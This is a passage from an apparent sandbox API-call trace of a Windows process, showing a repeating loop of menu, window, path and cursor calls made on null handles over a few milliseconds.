ptScreen=0x345) returned -1 [0100.610] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.610] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.610] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.610] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.610] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.611] GetStockObject (i=6) returned 0x1b00018 [0100.611] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.611] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.611] PathFileExistsW (pszPath=0x0) returned 0 [0100.611] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.611] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.611] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.611] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.611] GetMenu (hWnd=0x0) returned 0x0 [0100.611] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x443) returned -1 [0100.611] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.611] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.611] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.611] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.611] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.611] GetStockObject (i=6) returned 0x1b00018 [0100.611] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.611] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.611] PathFileExistsW (pszPath=0x0) returned 0 [0100.611] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.611] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.611] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.611] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.611] GetMenu (hWnd=0x0) returned 0x0 [0100.611] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.611] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.611] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.611] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.611] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.611] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.611] GetStockObject (i=6) returned 0x1b00018 [0100.611] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.611] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.611] PathFileExistsW (pszPath=0x0) returned 0 [0100.611] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.611] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.612] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.612] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.612] GetMenu (hWnd=0x0) returned 0x0 [0100.612] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x346) returned -1 [0100.612] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.612] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.612] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.612] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.612] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.612] GetStockObject (i=6) returned 0x1b00018 [0100.612] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.612] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.612] PathFileExistsW (pszPath=0x0) returned 0 [0100.612] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.612] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.612] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.612] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.612] GetMenu (hWnd=0x0) returned 0x0 [0100.612] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.612] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.612] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.612] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.612] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.612] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.612] GetStockObject (i=6) returned 0x1b00018 [0100.612] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.612] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.612] PathFileExistsW (pszPath=0x0) returned 0 [0100.612] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.612] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.612] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.612] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.612] GetMenu (hWnd=0x0) returned 0x0 [0100.612] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x348) returned -1 [0100.612] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.612] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.612] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.613] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.613] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.613] GetStockObject (i=6) returned 0x1b00018 [0100.613] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.613] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.613] PathFileExistsW (pszPath=0x0) returned 0 [0100.613] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.613] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.613] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.613] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.613] GetMenu (hWnd=0x0) returned 0x0 [0100.613] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x26d) returned -1 [0100.613] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.613] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.613] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.613] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.613] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.613] GetStockObject (i=6) returned 0x1b00018 [0100.613] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.613] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.613] PathFileExistsW (pszPath=0x0) returned 0 [0100.613] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.613] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.613] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.613] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.613] GetMenu (hWnd=0x0) returned 0x0 [0100.613] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.613] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.613] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.613] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.613] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.613] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.613] GetStockObject (i=6) returned 0x1b00018 [0100.613] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.614] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.614] PathFileExistsW (pszPath=0x0) returned 0 [0100.614] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.614] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.614] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.614] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.614] GetMenu (hWnd=0x0) returned 0x0 [0100.614] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x342) returned -1 [0100.614] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.614] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.614] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.614] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.614] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.614] GetStockObject (i=6) returned 0x1b00018 [0100.614] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.614] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.614] PathFileExistsW (pszPath=0x0) returned 0 [0100.614] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.614] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.614] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.614] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.614] GetMenu (hWnd=0x0) returned 0x0 [0100.614] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.614] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.614] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.614] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.614] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.614] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.614] GetStockObject (i=6) returned 0x1b00018 [0100.614] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.614] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.614] PathFileExistsW (pszPath=0x0) returned 0 [0100.614] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.614] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.614] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.614] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.615] GetMenu (hWnd=0x0) returned 0x0 [0100.615] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x346) returned -1 [0100.615] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.615] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.615] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.615] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.615] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.615] GetStockObject (i=6) returned 0x1b00018 [0100.615] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.615] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.615] PathFileExistsW (pszPath=0x0) returned 0 [0100.615] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.615] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.615] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.615] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.615] GetMenu (hWnd=0x0) returned 0x0 [0100.615] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x491) returned -1 [0100.615] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.615] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.615] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.615] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.615] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.615] GetStockObject (i=6) returned 0x1b00018 [0100.615] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.615] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.615] PathFileExistsW (pszPath=0x0) returned 0 [0100.615] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.615] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.615] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.615] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.615] GetMenu (hWnd=0x0) returned 0x0 [0100.615] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.615] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.615] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.615] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.615] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.616] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.616] GetStockObject (i=6) returned 0x1b00018 [0100.616] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.616] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.616] PathFileExistsW (pszPath=0x0) returned 0 [0100.616] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.616] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.616] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.616] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.616] GetMenu (hWnd=0x0) returned 0x0 [0100.616] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x343) returned -1 [0100.616] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.616] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.616] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.616] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.616] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.616] GetStockObject (i=6) returned 0x1b00018 [0100.616] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.616] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.616] PathFileExistsW (pszPath=0x0) returned 0 [0100.616] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.616] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.616] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.616] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.616] GetMenu (hWnd=0x0) returned 0x0 [0100.616] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.616] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.616] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.616] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.616] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.616] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.616] GetStockObject (i=6) returned 0x1b00018 [0100.616] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.616] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.616] PathFileExistsW (pszPath=0x0) returned 0 [0100.616] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.616] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.617] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.617] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.617] GetMenu (hWnd=0x0) returned 0x0 [0100.617] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.617] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.617] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.617] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.617] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.617] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.617] GetStockObject (i=6) returned 0x1b00018 [0100.617] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.617] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.617] PathFileExistsW (pszPath=0x0) returned 0 [0100.617] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.617] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.617] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.617] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.617] GetMenu (hWnd=0x0) returned 0x0 [0100.617] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x185) returned -1 [0100.617] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.617] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.617] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.617] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.617] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.617] GetStockObject (i=6) returned 0x1b00018 [0100.617] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.617] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.617] PathFileExistsW (pszPath=0x0) returned 0 [0100.617] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.617] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.617] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.617] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.617] GetMenu (hWnd=0x0) returned 0x0 [0100.617] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.617] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.617] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.618] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.618] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.618] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.618] GetStockObject (i=6) returned 0x1b00018 [0100.618] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.618] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.618] PathFileExistsW (pszPath=0x0) returned 0 [0100.618] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.618] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.618] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.618] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.618] GetMenu (hWnd=0x0) returned 0x0 [0100.618] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x347) returned -1 [0100.618] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.618] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.618] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.618] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.618] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.618] GetStockObject (i=6) returned 0x1b00018 [0100.618] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.618] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.618] PathFileExistsW (pszPath=0x0) returned 0 [0100.618] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.618] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.618] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.618] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.618] GetMenu (hWnd=0x0) returned 0x0 [0100.618] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.618] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.618] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.618] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.618] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.618] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.618] GetStockObject (i=6) returned 0x1b00018 [0100.618] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.618] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.619] PathFileExistsW (pszPath=0x0) returned 0 [0100.619] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.619] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.619] FindWindowA 